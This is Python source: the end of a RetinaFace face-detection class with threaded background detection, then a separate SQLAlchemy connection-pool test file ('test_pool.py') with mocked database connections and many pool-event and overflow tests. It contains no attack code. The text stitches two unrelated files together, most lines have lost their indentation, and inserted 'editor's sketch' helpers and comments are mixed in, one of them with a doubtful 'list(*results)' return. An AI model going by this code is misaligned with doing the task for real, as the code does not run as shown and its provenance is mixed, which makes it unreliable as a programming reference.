im = np.expand_dims(im, 0)
output = self.session.run([], {"input0": im})
loc, conf = output[0][0], output[1][0]
boxes = decode(loc, self.priorbox, [0.1, 0.2])
boxes = boxes * scale
scores = conf[:, 1]
inds = np.where(scores > self.min_conf)[0]
boxes = boxes[inds]
scores = scores[inds]
dets = np.hstack((boxes, scores[:, np.newaxis])).astype(np.float32, copy=False)
keep = py_cpu_nms(dets, self.nms_threshold)
dets = dets[keep, :]
dets = dets[:self.top_k, 0:4]
dets[:, 2:4] = dets[:, 2:4] - dets[:, 0:2]
if True:#is_background:
upsize = dets[:, 2:4] * np.array([[0.15, 0.2]])
dets[:, 0:2] -= upsize
dets[:, 2:4] += upsize * 2
return list(map(tuple, dets))
def background_detect(self, frame):
if self.running or self.finished:
return
self.running = True
im = copy.copy(frame)
thread = threading.Thread(target=worker_thread, args=(self, im))
thread.start()
def get_results(self):
if self.finished:
results = []
try:
while True:
detection = self.results.get(False)
results.append(detection)
            except queue.Empty:
                # queue drained; return whatever detections were collected
                pass
self.finished = False
            return list(*results)  # the queue holds at most one detection list per background run
else:
return []
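def _background_detect_demo(grab_frame):
    # Editor's sketch (hedged): the intended non-blocking pattern for a video loop,
    # using only methods defined above. `grab_frame` is an assumed callable that
    # returns BGR frames (or None to stop); it is not part of this module.
    detector = RetinaFaceDetector(top_k=4)
    latest_faces = []
    while True:
        frame = grab_frame()
        if frame is None:
            break
        detector.background_detect(frame)   # no-op while a detection is already in flight
        results = detector.get_results()    # [] until the worker thread has finished
        if results:
            latest_faces = results
        for (x, y, w, h) in latest_faces:
            cv2.rectangle(frame, (int(x), int(y)), (int(x + w), int(y + h)), (0, 255, 0), 1)
    return latest_faces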
if __name__== "__main__":
retina = RetinaFaceDetector(top_k=40, min_conf=0.2)
im = cv2.imread(sys.argv[1], cv2.IMREAD_COLOR)
start = time.perf_counter()
faces = retina.detect_retina(im)
end = 1000 * (time.perf_counter() - start)
print(f"Runtime: {end:.3f}ms")
for (x,y,w,h) in faces:
        im = cv2.rectangle(im, (int(x),int(y)), (int(x+w),int(y+h)), (0,0,255), 1)
cv2.imshow("Frame", im)
while cv2.waitKey(0) & 0xff != ord('q'):
""
|
test_pool.py
|
import collections
import random
import threading
import time
import weakref
import sqlalchemy as tsa
from sqlalchemy import event
from sqlalchemy import pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy.engine import default
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_context_ok
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.mock import ANY
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import lazy_gc
join_timeout = 10
def MockDBAPI(): # noqa
def cursor():
return Mock()
def connect(*arg, **kw):
def close():
conn.closed = True
# mock seems like it might have an issue logging
# call_count correctly under threading, not sure.
# adding a side_effect for close seems to help.
conn = Mock(
cursor=Mock(side_effect=cursor),
close=Mock(side_effect=close),
closed=False,
)
return conn
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect)
db.is_shutdown = value
db = Mock(
connect=Mock(side_effect=connect), shutdown=shutdown, is_shutdown=False
)
return db
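def _mockdbapi_demo():
    # Editor's sketch (hedged), not part of the original suite: MockDBAPI() stands in
    # for a real DBAPI module so a pool can be exercised without a database; the
    # "foo.db" argument is simply recorded by the Mock.
    dbapi = MockDBAPI()
    p = pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), pool_size=1, max_overflow=0)
    conn = p.connect()               # hands out a mocked DBAPI connection
    conn.close()                     # checkin: the mock returns to the pool, not closed
    p.dispose()                      # dispose() closes the pooled mock connection
    return dbapi.connect.call_count  # 1 -- only one underlying connection was created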
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
self._teardown_conns = []
def teardown(self):
for ref in self._teardown_conns:
conn = ref()
if conn:
conn.close()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _with_teardown(self, connection):
self._teardown_conns.append(weakref.ref(connection))
return connection
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
class PoolTest(PoolTestBase):
@testing.fails_on(
"+pyodbc", "pyodbc cursor doesn't implement tuple __eq__"
)
@testing.fails_on("+pg8000", "returns [1], not (1,)")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select(1).compile(testing.db)))
expected = [(1,)]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (
pool.SingletonThreadPool,
pool.StaticPool,
pool.QueuePool,
pool.NullPool,
pool.AssertionPool,
):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.info)
c.invalidate()
c = p.connect()
self.assert_("foo" not in c.info)
c.info["foo2"] = "bar2"
c.detach()
self.assert_("foo2" in c.info)
c2 = p.connect()
is_not(c.connection, c2.connection)
assert not c2.info
assert "foo2" in c.info
def test_rec_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.record_info)
self.assert_(c.record_info is c._connection_record.record_info)
c.record_info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.record_info)
c.invalidate()
c = p.connect()
self.assert_("foo" in c.record_info)
c.record_info["foo2"] = "bar2"
c.detach()
is_(c.record_info, None)
is_(c._connection_record, None)
c2 = p.connect()
assert c2.record_info
assert "foo2" in c2.record_info
def test_rec_unconnected(self):
# test production of a _ConnectionRecord with an
# initially unconnected state.
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1, connect=False)
assert not r1.connection
c1 = r1.get_connection()
is_(c1, r1.connection)
def test_rec_close_reopen(self):
# test that _ConnectionRecord.close() allows
# the record to be reusable
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1)
c1 = r1.connection
c2 = r1.get_connection()
is_(c1, c2)
r1.close()
assert not r1.connection
eq_(c1.mock_calls, [call.close()])
c2 = r1.get_connection()
is_not(c1, c2)
is_(c2, r1.connection)
eq_(c2.mock_calls, [])
@testing.combinations(
(
pool.QueuePool,
dict(pool_size=8, max_overflow=10, timeout=25, use_lifo=True),
),
(pool.QueuePool, {}),
(pool.NullPool, {}),
(pool.SingletonThreadPool, {}),
(pool.StaticPool, {}),
(pool.AssertionPool, {}),
)
def test_recreate_state(self, pool_cls, pool_args):
creator = object()
pool_args["pre_ping"] = True
pool_args["reset_on_return"] = "commit"
pool_args["recycle"] = 35
pool_args["logging_name"] = "somepool"
pool_args["dialect"] = default.DefaultDialect()
pool_args["echo"] = "debug"
p1 = pool_cls(creator=creator, **pool_args)
cls_keys = dir(pool_cls)
d1 = dict(p1.__dict__)
p2 = p1.recreate()
d2 = dict(p2.__dict__)
for k in cls_keys:
d1.pop(k, None)
d2.pop(k, None)
for k in (
"_threadconns",
"_invoke_creator",
"_pool",
"_overflow_lock",
"_fairy",
"_conn",
"logger",
):
if k in d2:
d2[k] = mock.ANY
eq_(d1, d2)
eq_(p1.echo, p2.echo)
is_(p1._dialect, p2._dialect)
if "use_lifo" in pool_args:
eq_(p1._pool.use_lifo, p2._pool.use_lifo)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append("R")
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append("C")
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append("CL")
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ["R", "CL", "R"])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ["R", "CL", "R"])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ["R", "CL", "R"])
def test_null_pool(self):
self._do_test(pool.NullPool, ["R", "CL", "R", "CL"])
def test_static_pool(self):
self._do_test(pool.StaticPool, ["R", "R"])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append("first_connect")
event.listen(p, "first_connect", first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append("connect")
event.listen(p, "connect", connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append("checkout")
event.listen(p, "checkout", checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append("checkin")
event.listen(p, "checkin", checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append("reset")
event.listen(p, "reset", reset)
return p, canary
def _invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "invalidate", canary)
return p, canary
def _soft_invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "soft_invalidate", canary)
return p, canary
def _close_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close", canary)
return p, canary
def _detach_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "detach", canary)
return p, canary
def _close_detached_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close_detached", canary)
return p, canary
def test_close(self):
p, canary = self._close_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.close()
eq_(canary.mock_calls, [])
p.dispose()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach(self):
p, canary = self._detach_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.detach()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach_close(self):
p, canary = self._close_detached_event_fixture()
c1 = p.connect()
connection = c1.connection
c1.detach()
c1.close()
eq_(canary.mock_calls, [call(connection)])
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
p.connect()
eq_(canary, ["connect"])
def test_connect_insert_event(self):
p = self._queuepool_fixture()
canary = []
def connect_one(*arg, **kw):
canary.append("connect_one")
def connect_two(*arg, **kw):
canary.append("connect_two")
def connect_three(*arg, **kw):
canary.append("connect_three")
event.listen(p, "connect", connect_one)
event.listen(p, "connect", connect_two, insert=True)
event.listen(p, "connect", connect_three)
p.connect()
eq_(canary, ["connect_two", "connect_one", "connect_three"])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect() # noqa
c2 = p.connect() # noqa
eq_(canary, ["connect", "connect"])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
p.connect()
eq_(canary, ["checkout"])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
p.connect()
p.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["reset"])
def test_soft_invalidate_event_no_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate(soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_soft_invalidate_event_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc, soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_invalidate_event_no_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate()
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_invalidate_event_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
@testing.requires.predictable_gc
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ["checkin"])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
c2.close()
eq_(canary, ["checkin", "checkin"])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, "connect", listen_one)
event.listen(engine.pool, "connect", listen_two)
event.listen(engine, "connect", listen_three)
event.listen(engine.__class__, "connect", listen_four)
engine.execute(select(1)).close()
eq_(
canary, ["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to
that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, "connect", listen_one)
event.listen(pool.QueuePool, "connect", listen_two)
event.listen(pool.SingletonThreadPool, "connect", listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def test_connect_event_fails_invalidates(self):
fail = False
def listen_one(conn, rec):
if fail:
raise Exception("it failed")
def listen_two(conn, rec):
rec.info["important_flag"] = True
p1 = pool.QueuePool(
creator=MockDBAPI().connect, pool_size=1, max_overflow=0
)
event.listen(p1, "connect", listen_one)
event.listen(p1, "connect", listen_two)
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.invalidate()
conn.close()
fail = True
assert_raises(Exception, p1.connect)
fail = False
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.close()
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
# test [ticket:2964]
@testing.requires.timing_intensive
def test_sync(self):
pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
evt = Mock()
@event.listens_for(pool, "first_connect")
def slow_first_connect(dbapi_con, rec):
time.sleep(1)
evt.first_connect()
@event.listens_for(pool, "connect")
def on_connect(dbapi_con, rec):
evt.connect()
def checkout():
for j in range(2):
c1 = pool.connect()
time.sleep(0.02)
c1.close()
time.sleep(0.02)
threads = []
# what we're trying to do here is have concurrent use of
# all three pooled connections at once, and the thing we want
# to test is that first_connect() finishes completely before
# any of the connections get returned. so first_connect()
# sleeps for one second, then pings the mock. the threads should
# not have made it to the "checkout() event for that one second.
for i in range(5):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
# there is a very unlikely condition observed in CI on windows
# where even though we have five threads above all calling upon the
# pool, we didn't get concurrent use of all three connections, two
# connections were enough. so here we purposely just check out
# all three at once just to get a consistent test result.
make_sure_all_three_are_connected = [pool.connect() for i in range(3)]
for conn in make_sure_all_three_are_connected:
conn.close()
eq_(
evt.mock_calls,
[
call.first_connect(),
call.connect(),
call.connect(),
call.connect(),
],
)
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1)
reaper = testing.engines.ConnectionKiller()
reaper.add_pool(p)
def status(pool):
return (
pool.size(),
pool.checkedin(),
pool.overflow(),
pool.checkedout(),
)
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
reaper.assert_all_closed()
def test_timeout_accessor(self):
expected_timeout = 123
p = self._queuepool_fixture(timeout=expected_timeout)
eq_(p.timeout(), expected_timeout)
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(tsa.exc.TimeoutError, p.connect)
assert int(time.time() - now) == 2
@testing.requires.timing_intensive
def test_timeout_subsecond_precision(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0, timeout=0.5)
c1 = p.connect() # noqa
with expect_raises(tsa.exc.TimeoutError):
now = time.time()
c2 = p.connect() # noqa
# Python timing is not very accurate, the time diff should be very
# close to 0.5s but we give 200ms of slack.
assert 0.3 <= time.time() - now <= 0.7, "Pool timeout not respected"
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=0.05),
pool_size=2,
max_overflow=1,
timeout=3,
)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
            # normally, the timeout should be under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
reaper = testing.engines.ConnectionKiller()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(0.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(
creator=creator, pool_size=3, timeout=2, max_overflow=max_overflow
)
reaper.add_pool(p)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(0.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
reaper.assert_all_closed()
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(target=run_test, args=("success_one", p, False)),
threading.Thread(target=run_test, args=("success_two", p, False)),
threading.Thread(target=run_test, args=("overflow_one", p, True)),
threading.Thread(target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False)
),
]
for t in threads:
t.start()
time.sleep(0.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[
call("success_one"),
call("success_two"),
call("overflow_two"),
call("overflow_three"),
call("overflow_one"),
],
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
with mutex:
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(
creator=creator,
pool_size=2,
timeout=timeout,
max_overflow=max_overflow,
)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(0.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter, args=(p, timeout, max_overflow)
)
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(0.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout,
):
conn = p.connect()
is_(conn._connection_record.connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator, pool_size=1, timeout=None, max_overflow=0
)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(0.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1,))
t.start()
threads.append(t)
time.sleep(0.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=dbapi.connect, pool_size=2, timeout=None, max_overflow=0
)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_overflow_no_gc(self):
p = self._queuepool_fixture(pool_size=2, max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0]),
)
def test_recycle(self):
with patch("sqlalchemy.pool.base.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1, max_overflow=0, recycle=30
)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.connection is None
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
c2.invalidate(soft=True)
is_(c2_rec.connection, c2.connection)
c2.close()
c3 = p.connect()
is_not(c3.connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.connection, c3.connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record, pool, ref, echo, fairy=None
):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback"
)
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy
)
return patch.object(pool, "_finalize_fairy", assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
with self._no_wr_finalize():
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
